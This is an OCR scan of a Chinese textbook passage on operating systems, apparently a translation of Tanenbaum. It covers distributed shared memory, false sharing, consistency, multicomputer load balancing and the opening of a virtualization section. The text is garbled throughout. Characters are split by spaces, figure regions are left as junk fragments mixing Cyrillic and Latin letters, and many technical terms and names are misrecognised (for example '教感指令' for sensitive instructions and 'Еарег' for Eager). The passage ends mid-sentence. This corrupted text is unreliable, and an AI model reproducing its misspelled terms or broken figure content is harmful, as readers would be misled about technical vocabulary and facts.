他 的 页 面 会 导致 陷入 。 例 如 ， 对 页 面 10 的 引用 会 导致 陷入 到 DSM 软 件 ， 该 软件 把 页 面 10 从 节点 1 移 到 节 
点 0， 如 图 8-22b 所 示 。 

[ЕЛП 

对 基本 系统 的 一 个 改进 是 复制 那些 只 读 页 面 ， 如 程序 代码 、 只 读 常量 或 其 他 只 读数 据 结构 ， 它 可 以 
明显 地 提高 性 能 。 举 例 来 说 ， 如 果 在 图 8-22 中 的 页 面 10 是 一 段 程序 代码 ，CPU 0 对 它 的 使 用 可 以 导致 将 
一 个 副本 送 往 CPU 0， 从 而 不 用 打扰 CPU 1 的 原 有 存储 器 ， 如 图 8-22c 所 示 。 在 这 种 方式 中 ，CPU 0 和 
CPU 1 两 者 可 以 按 需 要 经 常 同时 引用 页 面 10， 而 不 会 产生 由 于 引用 不 存在 的 存储 器 页 面 而 导致 的 陷阱 。 

另 一 种 可 能 是 ， 不 仅 复 制 只 读 页 面 ， 而 且 复制 所 有 的 页 面 。 只 要 有 读 操作 在 进行 ， 实际 上 在 只 读 页 
面 的 复制 和 可 读 写 页 面 的 复制 之 间 不 存在 差别 。 但 是 ， 如 果 一 个 被 复制 的 页 面 突然 被 修改 了 ， 就 必须 采 
取 必 要 的 措施 来 避免 多 个 不 一 致 的 副本 存在 。 如 何 避 免 不 一 致 性 将 在 下 面 几 节 中 进行 讨论 。 
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机 器 ! 机 器 2 机 器 1 机 器 2 机 器 1 机 器 2 
= 
应 用 应 用 应 用 
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系统 系 系统 
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图 8-21 实现 共享 存储 器 的 不 同 层 次 : a) 硬件 ，b) 操 作 系统 ，c) 用 户 层 软件 
由 16 个 页 面 组 成 的 全 局 共享 的 虚拟 存储 器 


| 一 存储 器 


oaa pag caa ma 
JA | 回 am 
СРОО CPU1 CPU2 CPU 3 
| 
b) 
[о][2][5 JAA Bao 回回 
回 四 回回 回 四 
CPuo Cpu1 CPU2 CPU3 
L У] I Ls 


c) 
图 8-22 а) 分 布 在 四 台 机 器 中 的 地 址 空间 页 面 ，b) 在 CPU 1 引用 页 面 10 后 的 情形 ， 
9 如 果 页 面 10 是 只 读 的 并 且 使 用 了 复制 的 情形 
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2. 伪 共 享 

在 某 些 关键 方式 上 DSM 系 统 与 多 处 理 机 类 似 。 在 这 两 种 系统 中 ， 当 引用 非 本 地 存储 器 字 时 ， 从 该 
字 所 在 的 机 器 上 取 包 含 该 字 的 一 块 内存 ， 并 放 到 进行 引用 的 (分 别 是 内 存储 器 或 高 速 缓存 ) 相关 机 器 上 。 
一 个 重要 的 设计 问题 是 应 该 调 取 多 大 一 块 。 在 多 处 理 机 中 ， 共 高 速 缓存 块 的 大 小 通常 是 32 字 节 或 64 字 节 ， 
这 是 为 了 避免 占用 总 线 传输 的 时 间 过 长 。 在 DSM 系 统 中 ， 块 的 单位 必须 是 页 面 大 小 的 整数 倍 (因为 
MMU 以 页 面 方式 工作 )， 不 过 可 以 是 1 个 、2 个 、4 个 或 更 多 个 页 面 。 事 实 上 ， 这 样 做 就 模拟 了 一 个 更 大 
尺寸 的 页 面 。 

对 于 DSM 而 言 ， 较 大 的 页 面 大 小 有 优点 也 有 缺点 。 其 最 大 的 优点 是 ， 因 为 网 络 传输 的 启动 时 间 是 
相当 长 的 , 所 以 传递 4096 字 节 并 不 比 传输 1024 个 字 节 多 花费 多 少时 间 。 在 有 大 量 的 地 址 空间 需要 移动 时 ， 
通过 采用 大 单位 的 数据 传输 ， 通 常 可 减少 传输 的 次 数 。 这 个 特性 是 非常 重要 的 ， 因 为 许多 程序 表现 出 引 
用 上 的 局 部 性 ， 其 含义 是 如 果 一 个 程序 引用 了 某 页 中 的 一 个 字 ， 很 可 能 在 不 久 的 将 来 它 还 会 引用 同一 个 
页 面 中 其 他 字 。 

另 一 方面 ， 大 页 面 的 传输 造成 网 络 长 期 占用 ,阻塞 了 其 他 进程 引起 的 故障 。 还 有 ， 过 大 的 有 效 页 面 
引起 了 另 一 个 问题 ， 称 为 伪 共 享 (false sharing) ， 如 图 8-23 所 示 。 图 8-23 中 一 个 页 面 中 含有 两 个 无 关 的 
共享 变量 A 和 B。 进 程 1 大 量 使 用 A， 进 行 读 写 操作 。 类 似 地 ， 进 程 2 经 常 使 用 B。 在 这 种 情形 下 ， 含 有 这 
两 个 变量 的 页 面 将 在 两 台 机 器 中 来 回 地 传送 。 


CPU1 CPU2 


A 和 B 是 不 相关 的 共享 变量 ， 它 
们 恰巧 在 同一 个 页 面 上 


图 8-23 含有 两 个 无 关 变量 的 页 面 的 伪 共享 


这 里 的 问题 是 ， 尽 管 这 些 变量 是 无 关 的 ， 但 它们 碰巧 在 同一 个 页 面 内 ， 所 以 当 某 个 进程 使 用 其 中 一 
个 变量 时 ， 它 也 得 到 另 一 个 。 有 效 页 面 越 大 ， 发 生 伪 共享 的 可 能 性 也 越 高 ， 相 反 ， 有 效 页 面 越 小 ， 发 生 
伪 共 享 的 可 能 性 也 越 少 。 在 普通 的 虚拟 内 存 系统 中 不 存在 类 似 的 现象 。 

理解 这 个 问题 并 把 变量 放 在 相应 的 地 址 空间 中 的 高 明 编译 器 能 够 帮助 减少 伪 共 享 并 改善 性 能 .但 是 ， 
说 起 来 容易 做 起 来 难 。 而 且 ， 如 果 伪 共享 中 节点 1 使 用 某 个 数组 中 的 一 个 元 素 ， 而 节点 2 使 用 同一 数组 中 
的 另 一 个 元 素 ， 那么 即使 再 高 明 的 编译 器 也 没有 办 法 消除 这 个 问题 。 

3. 实现 顺序 一 致 性 

如 果 不 对 可 写 页 面 进行 复制 ， 那 么 实现 一 致 性 是 没有 问题 的 。 每 个 可 写 页 面 只 对 应 有 一 个 副本 ， 在 
需要 时 动态 地 来 回 移动 。 由 于 并 不 是 总 能 提前 了 解 哪些 页 面 是 可 写 的， 所 以 在 许多 DSM 系 统 中 ， 当 一 个 
进程 试图 读 一 个 远程 页 面 时 ， 则 复制 一 个 本 地 副本 ， 在 本 地 和 远程 各 自 对 应 的 MMU 中 建立 只 读 副本 。 
只 要 所 有 的 引用 都 做 读 操作 ， 那 么 一 切 正常 。 

但 是 ， 如 果 有 一 个 进程 试图 在 一 个 被 复制 的 页 面 上 写 信 ， 潜 在 的 一 致 性 问题 就 会 出 现 ， 因 为 只 修改 
一 个 副本 却 不 管 其 他 副本 的 做 法 是 不 能 接受 的 。 这 种 情形 与 在 多 处 理 机 中 一 个 CPU 试图 修改 存在 于 多 个 
高 速 缓存 中 的 一 个 字 的 情况 有 类 似 之 处 。 在 多 处 理 机 中 的 解决 方案 是 ， 要 进行 写 的 CPU 首先 将 一 个 信和 号 
放 到 总 线 上 ， 通 知 所 有 其 他 的 CPU 丢弃 该 高 速 缓存 块 的 副本 。 这 里 的 DSM 系 统 以 同样 的 方式 工作 。 在 对 
-个 共享 页 面 进行 写 人 之 前 ， 先 向 所 有 持 有 该 页 面 副 本 的 CPU 发 出 一 条 消息 ， 通 知 它们 解除 映射 并 丢弃 
该 页 面 。 在 其 所 有 解除 映射 等 工作 完成 之 后 ， 该 CPU 便 可 以 进行 写 操作 了 。 
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在 有 详细 约束 的 情况 下 ， 人 允许 可 写 页 面 的 多 个 副本 存在 是 有 可 能 的 。 一 种 方法 是 允许 一 个 进程 获得 
在 部 分 虚拟 地 址 空间 上 的 一 把 锁 ， 然 后 在 被 锁 住 的 存储 空间 中 进行 多 个 读 写 操作 。 在 该 锁 被 释放 时 ， 产 
生 的 修改 可 以 传播 到 其 他 副本 上 去 。 只 要 在 一 个 给 定 的 时 刻 只 有 一 个 CPU 能 锁 住 某 个 页 面 ， 这 样 的 机 制 
就 能 保持 一 致 性 。 

另 一 种 方法 是 ， 当 一 个 潜在 可 写 的 页 面 被 第 一 次 真正 写 和 时， 制作 一 个 “干净 ”的 副本 并 保存 在 发 
出 写 操作 的 CPU 上 。 然 后 可 在 该 页 上 加 锁 ， 更 新 页 面 ， 并 释放 锁 。 稍 后 ， 当 一 个 远程 机 器 上 的 进程 试图 
获得 该 页 面 上 的 锁 时 ， 先 前 进行 写 操作 的 CPU 将 该 页 面 的 当前 状态 与 “干净 ”副本 进行 比较 并 构造 一 个 
有 关 所 有 已 修改 的 字 的 列表 ， 该 列表 接着 被 送 往 获得 锁 的 CPU， 这 样 它 就 可 以 更 新 其 副本 页 面 而 不 用 废 
FE (Keleher 等 人 ，1994) 。 


8.2.6 多 计算 机 调度 

在 一 台 多 处 理 机 中 ， 所 有 的 进程 都 在 同一 个 存储 器 中 。 当 某 个 CPU 完成 其 当前 任务 后 ， 它 选择 一 个 
进程 并 运行 。 理 论 上 ， 所 有 的 进程 都 是 潜在 的 候选 者 。 而 在 一 台 多 计算 机 中 ， 情 形 就 大 不 相同 了 。 每 个 
节点 有 其 自己 的 存储 器 和 进程 集合 。CPU 1 不 能 突然 决定 运行 位 于 节点 4 上 的 一 个 进程 ， 而 不 事先 花费 相 
当 大 的 工作 量 去 获得 该 进程 。 这 种 差别 说 明 在 多 计算 机 上 的 调度 较为 容易 ， 但 是 将 进程 分 配 到 节点 上 的 
工作 更 为 重要 。 下 面 我 们 将 讨论 这 些 问题 。 

多 计算 机 调度 与 多 处 理 机 的 调度 有 些 类 似 ， 但 是 并 不 是 后 者 的 所 有 算法 都 能 适用 于 前 者 。 最 简单 的 
多 处 理 机 算法 一 一 维护 就 绪 进程 的 一 个 中 心 链表 一 一 就 不 能 工作 ， 因 为 每 个 进程 只 能 在 其 当前 所 在 的 
CPU 上 运行 。 不 过 ， 当 创建 一 个 新 进程 时 ， 存 在 着 一 个 决定 将 其 放 在 哪里 的 选择 ， 例 如 ， 从 平衡 负载 的 
考虑 出 发 。 

由 于 每 个 节点 拥有 自己 的 进程 ， 因 此 可 以 应 用 任何 本 地 调度 算法 。 但 是 ， 仍 有 可 能 采用 多 处 理 机 的 
群 调度 ， 因 为 惟一 的 要 求 是 有 一 个 初始 的 协议 来 决定 哪个 进程 在 哪个 时 间 槽 中 运行 ， 以 及 用 于 协调 时 间 
档 的 起 点 的 某 种 方法 。 

8.2.7 负载 平衡 

需要 讨论 的 有 关 多 计算 机 调度 的 内 容 相对 较 少 。 这 是 因为 一 旦 一 个 进程 被 指定 给 了 一个 节点 ， 就 可 
以 使 用 任何 本 地 调度 算法 ， 除 非 正在 使 用 群 调度 。 不 过 ， 一 旦 一 个 进程 被 指定 给 了 某 个 节点 ， 就 不 再 有 
什么 可 控制 的 ， 因 此 ， 哪 个 进程 被 指定 给 哪个 节点 的 决策 是 很 重要 的 。 这 同 多 处 理 机 系统 相反 ， 在 多 处 
理 机 系统 中 所 有 的 进程 都 在 同一 个 存储 器 中 ， 可 以 随意 调度 到 任何 CPU 上 运行 。 因 此 ， 值 得 考察 怎样 以 
有 效 的 方式 把 进程 分 配 到 各 个 节点 上 。 从 事 这 种 分 配 工作 的 算法 和 启发 则 是 所 谓 的 处 理 器 分 配 算法 
(processor allocation algorithm), 

多 年 来 已 出 现 了 大 量 的 处 理 器 (节点 ) 分 配 算法 。 它 们 的 差别 是 分 别 有 各 自 的 前 提 和 目标 。 可 知 的 
进程 属性 包括 CPU 需求 、 存 储 器 使 用 以 及 与 每 个 其 他 进程 的 通信 最 等 。 可 能 的 目标 包括 最 小 化 由 于 缺少 
本 地 工作 而 浪费 的 CPU 周期 ， 最 小 化 总 的 通信 带宽 ， 以 及 确保 用 户 和 进程 公平 性 等 。 下 面 将 讨论 几 个 算 
法 ， 以 使 读者 了 解 各 种 可 能 的 情况 。 

1. 图 论 确 定 算 法 

有 一 类 被 广泛 研究 的 算法 用 于 下 面 这 样 一 个 系统 ， 该 系统 包含 已 知 CPU 和 存储 器 需求 的 进程 ， 以 及 
给 出 每 对 进程 之 间 平 均 流量 的 已 知 矩 阵 。 如 果 进 程 的 数量 大 于 CPU 的 数量 4， 则 必须 把 若干 个 进程 分 配 
给 每 个 CPU。 其 想法 是 以 最 小 的 网 络 流量 完成 这 个 分 配 工作 。 

该 系统 可 以 用 一 个 带 权 图 表示 ， 每 个 顶点 是 一 个 进程 ， 而 每 个 弧 代表 两 个 进程 之 间 的 消息 流 。 在 数 
学 上 ， 该 问题 就 简化 为 在 特定 的 限制 条 件 下 (如 每 个 子 图 对 整个 CPU 和 存储 器 的 需求 低 于 某 些 限制 )， 寻 
找 一 个 将 图 分 割 (切割 ) 为 k 个 互 不 连接 的 子 图 的 方法 。 对 于 每 个 满足 限制 条 件 的 解决 方案 ， 完全 在 单个 
子 图 内 的 弧 代表 了 机 器 内 部 的 通信 ， 可 以 忽略 。 从 一 个 子 图 通 向 另 一 个 子 图 的 弧 代表 网 络 通信 。 目标 是 找 
出 可 以 使 网 络 流量 最 小 同时 满足 所 有 的 限制 条 件 的 分 割 方法 。 作 为 一 个 例子 ， 图 8-24 给 出 了 一 个 有 9 个 进 
程 的 系统 ， 这 9 个 进程 是 进程 A 至 !， 每 个 绝 上 标 有 两 个 进程 之 间 的 平均 通信 负载 (例如 ， 以 Mbps 为 单位 ) 。 

在 图 8-24a 中 ， 我 们 将 有 进程 A、E 和 G 的 图 划分 到 节点 1 上 ， 进 程 B、F 和 H 划 分 在 节点 2 上 ， 而 进程 
C、D 和 1 划分 在 节点 3 上 。 整 个 网 络 流量 是 被 切割 (虚线 ) 的 弧 上 的 流量 之 和 ， 即 30 个 单位 。 在 图 8-24b 
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中 ， 有 一 种 不 同 的 划分 方法 ， 只 有 28 个 单位 的 网 络 流量 。 假 设 该 方法 满足 所 有 的 存储 器 和 CPU 的 限制 条 
件 ， 那 么 这 个 方法 就 是 一 个 更 好 的 选择 ， 因 为 它 需 要 较 少 的 通信 流量 。 

直观 地 看 ， 我 们 所 做 的 是 寻找 紧 耦 合 〈 往 内 高 流量 ) 的 簇 (cluster) ， 并 且 与 其 他 的 徐 有 较 少 的 交 
互 ( 铸 外 低 流 量 )。 讨 论 这 些 问题 的 最 早 的 论文 是 (ChowHlAbraham, 1982; Lo, 1984, Stone 和 
Bokhari，1978) 等 。 


ы 


f Й 
节点 1 | 节点 2 | 节点 3 
~ 一 
i 


D 和 I 之 间 
© 的 流量 


进程 
图 8-24 将 9 个 进程 分 配 到 3 个 节点 上 的 两 种 方法 


2. 发 送 者 发 起 的 分 布 式 启发 算法 

现在 看 一 些 分 布 式 算法 。 有 一 个 算法 是 这 样 的 ， 当 进程 创建 时 ， 它 就 运行 在 创建 它 的 节点 上 ， 除 非 
该 节点 过 载 了 。 过 载 节点 的 度量 可 能 涉及 太 多 的 进程 ， 过 大 的 工作 集 ， 或 者 其 他 度量 。 如 果 过 载 了 ， 该 
节点 随机 选择 另 一 个 节点 并 询问 它 的 负载 情况 (使 用 同样 的 度量 )。 如 果 被 探查 的 节点 负载 低 于 某 个 阅 
值 ， 就 将 新 的 进程 送 到 该 节点 上 (Eager 等 人 ，1986) 。 如 果 不 是 ， 则 选择 另 一 个 机 器 探查 。 探 查 工作 并 
会 永远 进行 下 去 。 在 N 次 探查 之 内 ， 如 果 没 有 找到 合适 的 主机 ， 算 法 就 终止 ， 且 进程 继续 在 原 有 的 机 
器 上 运行 。 整 个 算法 的 思想 是 负载 较 重 的 节点 试图 忆 掉 超额 的 工作 ， 如 图 8-25a 所 示 。 该 图 描述 了 发 送 
者 发 起 的 负载 平衡。 


图 8-25 а) 过 载 的 节点 寻找 可 以 接收 进程 的 轻 载 节点 ，b) 一 个 空 节点 寻找 工作 做 


Еарег A (1986) 构造 了 一 个 该 算法 的 分 析 排队 模型 (queueing model) 。 使 用 这 个 模型 ， 所 建立 
的 算法 表现 良好 而 且 在 包括 不 同 的 阔 值 、 传 输 成 本 以 及 探查 限定 等 大 范围 的 参数 内 工作 稳定 。 

但 是 ， 应 该 看 到 在 负载 重 的 条 件 下 ， 所 有 的 机 器 都 会 持续 地 对 其 他 机 器 进行 探查 ， 徒 劳 地 试图 找到 
一 台 愿意 接收 更 多 工作 的 机 器 。 几 乎 没有 进程 能 够 被 卸载 ， 可 是 这 样 的 尝试 会 带 来 巨大 的 开销 。 

3. 接收 者 发 起 的 分 布 式 启发 算法 

上 面 所 给 出 的 算法 是 由 一 个 过 载 的 发 送 者 发 起 的 , 它 的 一 个 互补 算法 是 由 一 个 轻 载 的 接收 者 发 起 的 ， 
如 图 8-25b 所 示 。 在 这 个 算法 中 ， 只 要 有 一 个 进程 结束 ， 系 统 就 检查 是 否 有 足够 的 工作 可 做 。 如 果 不 是 ， 
它 随机 选择 某 台 机 器 并 要 求 它 提供 工作 。 如 果 该 台 机 器 没有 可 提供 的 工作 ， 会 接着 询问 第 二 台 ， 然 后 是 
第 三 台 机 器 。 如 果 在 N 次 探查 之 后 ， 还 是 没有 找到 工作 ， 该 节点 暂时 停止 询问 ， 去 做 任何 已 经 安排 好 的 
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工作 ， 而 在 下 一 个 进程 结束 之 后 机 器 会 再 次 进行 询问 。 如 果 没 有 可 做 的 工作 ， 机 器 就 开始 空间 。 在 经 过 
固定 的 时 间 间 隔 之 后 ， 它 又 开始 探查 。 

这 个 算法 的 优点 是 ， 在 关键 时 刻 它 不 会 对 系统 增加 额外 的 负担 。 发 送 者 发 起 的 算法 在 机 器 最 不 能 够 
容忍 时 一 一 此 时 系统 已 是 负载 相当 重 了 ， 做 了 大 量 的 探查 工作 。 有 了 接收 者 发 起 算法 ， 当 系统 负载 很 重 
时 ， 一 台 机 器 处 于 非 充分 工作 状态 的 机 会 是 很 小 的 。 但 是 ， 当 这 种 情形 确实 发 生 时 ， 它 就 会 较 容易 地 找 
到 可 承接 的 工作 。 当 然 ， 如 果 没有 什么 工作 可 做 ， 接 收 者 发 起 算法 也 会 制造 出 大 量 的 探查 流量 ， 因 为 所 
有 失业 的 机 器 都 在 拼命 地 寻找 工作 。 不 过 ， 在 系统 轻 载 时 增加 系统 的 负载 要 远 远 好 于 在 系统 过 载 时 再 增 
加 负载 。 

把 这 两 种 算法 组 合 起 来 是 有 可 能 的 ， 当 机 器 工作 太 多 时 可 以 试图 扼 掉 一 些 工作 ， 而 在 工作 不 多 时 可 
以 尝试 得 到 一 些 工作 。 此 外 ， 机 器 也 许可 以 通过 保留 一 份 以 往 探查 的 历史 i (用 以 确定 是 否 有 机 器 经 
常 性 处 于 轻 载 或 过 载 状态 ) 来 对 随机 轮 询 的 方法 进行 改进 。 可 以 首先 尝试 这 些 机 器 中 的 某 一 台 ， 这 取决 
于 发 起 者 是 试图 印 掉 工 作 还 是 获得 工作 。 


8.3 虚拟 化 

在 某 些 环境 下 ， 一 个 机 构 拥有 多 计算 机 系统 ， 但 事实 上 却 并 不 真正 需要 它 。 一 个 常见 的 例子 是 ， 一 
个 公司 同时 拥有 一 台电 子 邮 件 服务 器 、 一 台 Web 服 务 器 、 一 台 FTP 服 务 器 、 一 些 电子 商务 服务 器 和 其 他 服 
务 器 。 这 些 服务 器 运行 在 同一 个 设备 架 上 的 不 同 计算 机 中 ， 彼 此 之 间 以 高 速 网 络 连接 ， 也 就 是 说 ， 组 成 
一 个 多 计算 机 系统 。 在 有 些 情况 下 ， 这 些 服务 器 运行 在 不 同 的 机 器 上 是 因为 单独 的 一 台 机 器 难以 承受 这 
样 的 负载 ， 但 是 在 更 多 其 他 的 情况 下 ， 这 些 服务 器 不 能 作为 进程 运行 在 同一 台 机 器 上 最 重要 的 原因 是 可 
靠 性 (reliability) ,现实 中 不 能 相信 操作 系统 可 以 一 天 24 小 时 ， 一 年 365 或 366 天 连续 无 故障 地 运行 。 通 过 
把 每 个 服务 器 放 在 不 同 机 器 上 的 方法 ， 即 使 其 中 的 一 台 服 务 器 崩溃 了 ， 至 少 其 他 的 服务 器 不 会 受到 影响 。 
虽然 这 样 做 能 够 达到 容错 的 要 求 ， 但 是 这 种 解决 方法 太 过 昂贵 且 难 以 管理 ， 因为 涉及 太 多 的 机 器 。 

那 应 该 怎么 做 昵 ? 已 经 有 了 四 十 多 年 发 展 历史 的 虚拟 机 技术 ， 通 常 简称 为 虚拟 化 (virtualization), 
作为 一 种 解决 方法 被 提 了 出 来 ， 就 像 我 们 在 1.7.5 小 节 中 所 讨论 的 那样 。 这 种 技术 允许 一 台 机 器 中 存在 多 
台 虚拟 机 ， 每 一 台 虚 拟 机 可 能 运行 不 同 的 操作 系统 。 这 种 方法 的 好 处 在 于 ，-- 台 虚拟 机 上 的 错误 不 会 自 
动 地 使 其 他 虚拟 机 崩溃 。 在 一 个 虚拟 化 系统 中 ， 不 同 的 服务 器 可 能 运行 在 不 同 的 虚拟 机 中 ， 因 此 保持 了 
多 计算 机 系统 局 部 性 错误 的 模型 ， 但 是 代价 更 低 、 也 更 易于 维护 。 

当然 ， 如 此 来 联合 服务 器 看 起 来 就 像 是 把 所 有 的 鸡蛋 放 在 一 个 篮子 里 一 样 。 如 果 运 行 所 有 虚拟 机 的 
服务 器 崩溃 了 ， 其 结果 比 单独 一 台 专用 服务 器 崩溃 要 严重 得 多 。 但 是 虚拟 化 技术 能 够 起 作用 的 原因 在 于 
大 多 数 服务 器 停机 的 原因 不 是 因为 硬件 的 故障 ， 而 是 因为 腾 肿 、 不 可 靠 、 有 漏洞 的 软件 ， 特别 是 操作 系 
统 。 使 用 虚拟 化 技术 ， 惟 一 一 个 运行 在 内 核 态 的 软件 是 管理 程序 (hypervisor), 它 的 代码 量 比 一 个 完整 
操作 系统 的 代码 量 少 两 个 数量 级 ， 也 就 意味 着 软件 中 的 漏洞 数 也 会 少 两 个 数量 级 。 

除了 强大 的 隔离 性 ， 在 虚拟 机 上 运行 软件 还 有 其 他 的 好 处 。 其 中 之 一 就 是 减少 了 物理 机 器 的 数量 从 
而 节省 了 硬件 、 电 源 的 开支 以 及 占用 更 少 的 空间 。 对 于 一 个 公司 ， 比 如 说 亚马逊 (Amazon), 
(Yahoo), { Ж (Microsoft) 以 及 谷歌 《Google)， 它们 拥有 成 千 上 万 的 服务 器 运行 不 同 的 任务 ， 减 少 它 
们 数据 中 心 对 物理 机 器 的 需求 意味 着 节省 一 大 笔 开支 。 举 个 有 代表 性 的 例子 ， 在 大 公司 里 ， 不 同 的 部 门 
或 小 组 想 出 了 一 个 有 趣 的 想法 ， 然 后 去 买 一 台 服务 器 来 实现 它 。 如 果 想 法 不 断 产生 ， 就 需要 成 百 上 千 的 
服务 器 ， 公 司 的 数据 中 心 就 会 扩张 。 把 一 款 软件 移动 到 已 有 的 机 器 上 通常 会 很 困难 ， 这 是 因为 每 一 款 软 
件 都 需要 一 个 特定 版 本 的 操作 系统 ， 软 件 自身 的 函数 库 ， 配 置 文件 等 。 使 用 虚拟 机 ， 每 款 软 件 都 可 以 携 
带 属于 自己 的 环境 。 

虚拟 机 的 另 一 个 好 处 在 于 检查 点 和 虚拟 机 的 迁移 〈 例 如 ， 在 多 个 服务 器 间 迁 移 以 达到 负载 平衡 ) 比 
在 一 个 普通 的 操作 系统 中 进行 进程 迁移 更 加 容易 。 在 后 一 种 情况 下 ， 相当 数量 的 进程 关键 状态 信息 都 被 
保存 在 操作 系统 表 当 中 ， 包 括 与 打开 文件 、 警 报 、 信号 处 理 函 数 等 有 关 的 信息 。 当 迁移 一 个 虚拟 机 的 时 
候 ， 所 需要 移动 的 仅仅 是 内 存 映像 ， 因 为 在 移动 内 存 映 像 的 同时 所 有 的 操作 系统 表 也 会 移动 。 

虚拟 机 的 另 一 个 用 途 是 运行 那些 不 再 被 支持 或 不 能 在 当前 硬件 上 工作 的 操作 系统 (或 操作 系统 版 本 ) 
中 的 遗留 应 用 程序 (legacy application), 这 些 应 用 程序 可 以 和 当前 的 应 用 程序 在 相同 的 硬件 上 运行 。 事 
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实 上 ， 支 持 同时 运行 使 用 不 同 操作 系统 的 应 用 程序 是 赞成 虚拟 机 技术 的 一 个 重要 理由 。 

同时 ， 虞 拟 机 的 一 个 重要 应 用 是 软件 开发 。 一 个 程序 员 想 要 确保 他 的 软件 在 Windows 98, Windows 
2000、Windows XP、Windows Vista、 多 种 Linux 版 本 、FreeBSD、OpenBSD、NetBSD 和 Mac OS X 上 都 
可 以 正常 运行 ， 他 不 需要 有 一 打 的 计算 机 ， 以 及 在 不 同 的 计算 机 上 安装 不 同 的 操作 系统 。 相 反 ， 他 只 需 
要 在 一 台 物 理 机 上 创建 一 些 虚拟 机 ， 然 后 在 每 个 虚拟 机 上 安装 不 同 的 操作 系统 。 当 然 ， 这 个 程序 员 可 以 
给 他 的 磁盘 分 区 ， 然 后 在 每 个 分 区 上 安装 不 同 的 操作 系统 ， 但 是 这 种 方法 太 过 困难 。 首 先 ， 不 论 磁 盘 的 
容量 有 多 大 ， 标 PC 机 只 支持 四 个 主 分 区 。 其 次 ， 尽 管 在 引导 块 上 可 以 安装 一 个 多 引导 程序 ， 但 要 运 
行 另 一 个 操作 系统 就 必须 重启 计算 机 。 使 用 虚拟 机 ， 所 有 的 操作 系统 可 以 同时 运行 ， 因 为 它们 都 只 是 美 
妙 的 进程 。 

8.3.1 虚拟 化 的 条 件 

我 们 在 第 1 章 中 看 到 ， 有 两 种 虚拟 化 的 方法 。 一 种 管理 程序 (hypervisor), LHN EREA (或 
Жада В), ， 如 图 1-29a 所 示 。 实 质 上 ， 它 就 是 一 个 操作 系统 ， 因 为 它 是 惟一 一 个 运行 在 内 核 态 的 程 
序 。 它 的 工作 是 支持 真实 硬件 的 多 个 副本 ， 也 称 作 虚拟 机 (virtual machine) ， 与 普通 操作 系统 所 支持 的 
进程 类 似 。 相 反 ，II 型 管理 程序 ， 如 图 1-29b 所 示 ， 是 一 种 完全 不 同 的 类 型 。 它 只 是 一 个 运行 在 诸如 
Windows 或 Linux 平 台 上 ， 能 够 “解释 ”机 器 指令 集 的 用 户 程序 ， 它 也 创建 了 一 个 虚拟 机 。 我 们 把 “ 解 
释 ” 二 字 加 上 引号 是 因为 通常 代码 块 是 以 特殊 的 方式 进行 处 理 然后 缓存 并 且 直 接 执行 从 而 获得 性 能 上 的 
提升 ， 但 是 在 原理 上 ， 完 全 解释 也 是 可 行 的 ， 虽 然 速度 很 慢 。 两 种 情况 下 ， 运 行 在 管理 程序 上 的 操作 系 
统 都 称 为 客户 操作 系统 (guest operating system)。 在 I[ 型 管理 程序 的 情况 下 ， 运 行 在 硬件 上 的 操作 系统 
称 为 宿主 操作 系统 (host operating system), 

在 两 种 情况 下 ， 虚 拟 机 都 必须 像 真 实 机 器 一 样 工作 ， 认 识 到 这 一 点 非常 重要 。 也 就 是 说 ， 必 须 能 够 
像 真 实 机 器 那样 启动 虚拟 机 ， 像 真实 的 机 器 那样 在 其 上 安装 任意 的 操作 系统 。 管 理 程序 的 任务 就 是 提供 
这 种 错觉 ， 并 且 尽 量 高 效 (不 能 完全 解释 执行 ) 。 

虚拟 机 有 两 种 类 型 的 原因 与 Intel 386 体 系 结构 的 缺陷 有 关 ， 而 这 些 缺 陷 在 20 年 间 以 向 后 兼容 的 名 义 
被 宦 目 地 不 断 推进 到 新 的 CPU 中 。 简 单 地 说 ， 每 个 有 内 核 态 和 用 户 态 的 处 理 器 都 有 一 组 只 能 在 内 核 态 执 
行 的 指令 集合 ， 比 如 IO 指令 、 改 变 MMU 状 态 的 指令 等 。Popek 和 Goldberg (1974) 两 人 在 他 们 的 经 典 
虚拟 化 工作 中 称 这 些 指令 为 教 感 指令 (sensitive instruction)。 还 有 一 些 指令 如 果 在 用 户 态 下 执行 会 引起 
陷入 。Popek 和 Goldberg 称 它们 是 特权 指令 (privileged instruction)。 在 他 们 的 论文 中 首次 论述 指出 ， 当 
且 仅 当 敏感 指令 是 特权 指令 的 子 集 时 ， 机 器 才 是 可 虚拟 化 的 。 简 单 地 说 ， 如 果 你 想 做 一 些 在 用 户 态 下 不 
能 做 的 工作 ， 硬 件 应 该 陷入 。IBM/ 370 具 有 这 种 特性 ， 但 是 与 它 不 同 ，386 体 系 结构 不 具有 这 种 特性 。 
有 一 些 敏感 的 386 指 令 如 果 在 用 户 态 下 执行 就 会 被 忽略 。 举 例 来 说 ，POPF 指 令 替 换 标志 寄存 器 ， 会 改 
变 人 允许 /禁止 中 断 的 标志 位 。 但 是 在 用 户 态 下 ， 这 个 标志 位 不 被 改变 。 所 以 ，386 体 系 结构 和 它 的 后 代 都 
是 不 可 虚拟 化 的 ， 也 就 是 说 它们 不 能 支持 I 型 管理 程序 。 

事实 上 ,情况 比 上 面 描述 的 还 要 更 精 糕 一 些 。 除 了 某 些 指令 在 用 户 态 不 能 陷入 之 外 ， 还 有 一 些 指令 
可 以 在 用 户 态 读 取 敏感 状态 而 不 引起 陷 和 人。 比如 ， 在 Pentium 处 理 器 上 ， 一 个 程序 可 以 读 取代 码 段 选择 
F (selector) 的 值 从 而 判断 它 是 运行 在 用 户 态 还 是 内 核 态 上 。 如 果 一 个 操作 系统 做 同样 的 事情 ， 然 后 发 
现 它 运行 在 用 户 态 ， 那 么 就 可 能 据 此 作出 不 正确 的 判断 。 

从 2005 年 开始 ，Intel 和 AMD 公 司 在 它们 的 处 理 器 上 引进 了 虚拟 化 技术 ， 从 而 使 问题 得 到 了 解决 。 
在 Intel Core 2CPU 上 ， 这 种 技术 称 为 VT (Virtualization Technology)。 在 AMD Pacific CPU 上 ， 这 种 技 
术 称 为 SVM (Secure Virtual Machine)。 在 下 文 里 ， 我 们 一 般 使 用 VT 这 个 词 来 代表 。 它 们 的 灵感 都 来 自 
于 IBM YM/370， 但 是 也 有 一 些 细微 的 不 同 之 处 。 基 本 的 思想 是 创建 容器 使 得 虚拟 机 可 以 在 其 内 运行 。 
当 一 个 客户 操作 系统 在 一 个 容器 内 启动 ， 它 将 继续 运行 直到 它 引发 了 异常 而 陷入 到 管理 程序 。 例 如 ， 执 
行 一 条 IMO 指 令 。 陷 入 操作 由 管理 程序 通过 硬件 位 图 集 来 管理 。 有 了 这 些 扩展 ， 经 典 的 “陷入 -仿真 " 类 
